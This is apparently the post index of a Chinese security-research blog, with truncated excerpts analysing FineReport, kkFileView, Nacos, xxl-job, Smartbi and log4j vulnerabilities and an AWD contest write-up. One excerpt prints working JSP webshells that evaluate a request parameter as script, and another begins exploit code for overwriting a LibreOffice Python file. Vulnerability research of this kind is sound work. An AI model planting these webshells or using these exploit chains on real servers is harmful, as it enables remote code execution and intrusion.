H4cking to the Gate .

环境搭建该漏洞影响 FineReport 10.0、FineReport11.0、FineBI 的tomcat 部署包（7 月 23 日补丁版本之前的全部版本） 官网下载10.0.19安装包 修改FineReport_10.0\bin\designer.bat添加调试参数即可 1ssadfasdf 路由处理从v10开始,web.xml中不在设置自定义filter，使用注解来处理路由 这里从com.fr.third.springframework.web.servlet.DispatcherServlet#doDispatch方法来分析路由是如何处理的 漏洞分析Referencehttps://xz.aliyun.com/t/15188 https://forum.butian.net/article/514 https://y4tacker.github.io/2024/07/23/year/2024/7/%E6%9F%90%E8%BD%AFReport%E9%AB%98%E7%89%88%E6%9C%AC%E4%B8%AD%E5%88%A9%E7%94%A8%E7%9A%84%E4 ...

From CodeExec to JSjsp 2 jsshell.jsp 1234567<% javax.script.ScriptEngine engine = new javax.script.ScriptEngineManager().getEngineByName("js"); engine.put("request", request); engine.put("response", response); engine.eval(request.getParameter("mr6"));%> 甚至不用绑定request/response对象也可以 123<% out.println(new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("ant")));%> 类型选 ...

环境依赖如下，原生反序列化入口，jdk版本17，不出网 1234567891011121314151617181920212223242526<dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-test</artifactId> <scope>test</scope> </dependency> <dependenc ...

调试环境环境使用vulhub，源码版本v4.3.0，参考https://github.com/kekingcn/kkFileView/archive/refs/tags/v4.3.0.tar.gz 漏洞分析cn.keking.service.CompressFileReader#unRar中自己实现了解压的逻辑 1OutputStream out = new FileOutputStream( extractPath+ folderName + "_" + File.separator + str[0], true); 其中写文件的路径使用了拼接的办法导致了路径穿越，导致了任意文件写 kkFileView在使用odt转pdf时会调用系统的Libreoffice，而此进程会调用库中的uno.py文件，因此可以覆盖该py文件的内容 1234567891011121314import zipfileif __name__ == "__main__": try: binary1 = b'vulhub' ...

环境使用vulhub，配合远程调试，源码使用1.4.0 历史漏洞一些nacos的历史洞 漏洞编号 漏洞类型 影响范围 CVE-2021-29441 User-Agent权限绕过 <1.4.2 CVE-2021-29441的绕过 url权限绕过 <1.4.2 QVD-2023-6271 accessToken认证绕过 <=2.2.0 CVE-2021-29441的绕过 serverIdentity硬编码绕过 <=2.2.0 无 Hessian反序列化漏洞 2.0.0 <= Nacos < 2.2.3 /derby接口未授权来源于CVE-2021-29442，位于com.alibaba.nacos.config.server.controller.ConfigOpsController#derbyOps Nacos当时的版本是有鉴权的，但是这个路径没有添加@Secured注解，可以未授权访问，并且可以用这个功能执行sql语句。 1234567891011121314151617181 ...

2741b02c3d329547ef81e21cfc3f87ca47a8cc89da3b661ab2f22d964acc917fc0cd2d66a38ceeafa6a971911ebd7d5a674217f25ba478e8cd445e033b971379241c0246922dd61bc9ed530643fdfb390391f7ce8679425f751d70f8cbad0ab4f36850ca715f53617dd198c713e9038aab15b553ffcac4b6fbaa0fce898ded0bfe8fbb11b6b71eb99f7afda83668df8edd7adeece59984eed6baf4b8ee6d45c18f18e738f7619fae7f3994112de61697217658af6f4ccc69f0f82c1e8dfe77373273c69c5f5cc71f34e688276d20001cbbad1e546b3b4777fd4faa8579878b94d91b66f30b86a649deb80cbd892bdd27dfe236b86ca3d9c10 ...

碰到一个xxl-job，版本是1.9.2，仅仅只暴露了9999端口，并且不出网 executor未授权我们可以从9999端口入手，com.xxl.job.core.rpc.netcom.jetty.server.JettyServerHandler是一个自己实现的jetty服务，明显可以打hessian反序列化 1234567891011121314151617181920212223242526272829303132333435363738394041@Overridepublic void handle(String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { // invoke RpcResponse rpcResponse = doInvoke(request); // serialize response byte[] r ...

Smartbi登陆绕过补丁分析下载补丁 利用脚本 解码获得本次 补丁信息 12345678910111213141516171819202122232425262728293031{ "url": "/smartbix/api/monitor/setServiceAddress", "rules": [{ "type": "RejectSmartbixSetAddress" }] }, { "url": "/smartbix/api/monitor/setServiceAddress/", "rules": [{ "type": "RejectSmartbixSetAddress" }] }, { "url": ...

old-loggroovy写的一个web服务，用的框架是Grails，依赖中存在log4j 2.14.1，并且有可控的log参数，那就变成了一个jndi的利用 jdk 1.8jdk 11jdk 17jdk 21

梧桐杯决赛的awd题目，一共三台靶机，其中一台靶机上运行了两个java服务，这里做一下awd中java题目的总结 关于patch jar包可以参考 https://github.com/H4cking2theGate/JarPatcher actuator-testbed本题的依赖如下，springboot版本为2.0.5.RELEASE 123456789101112131415161718192021222324252627282930<dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId></dependency><dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter ...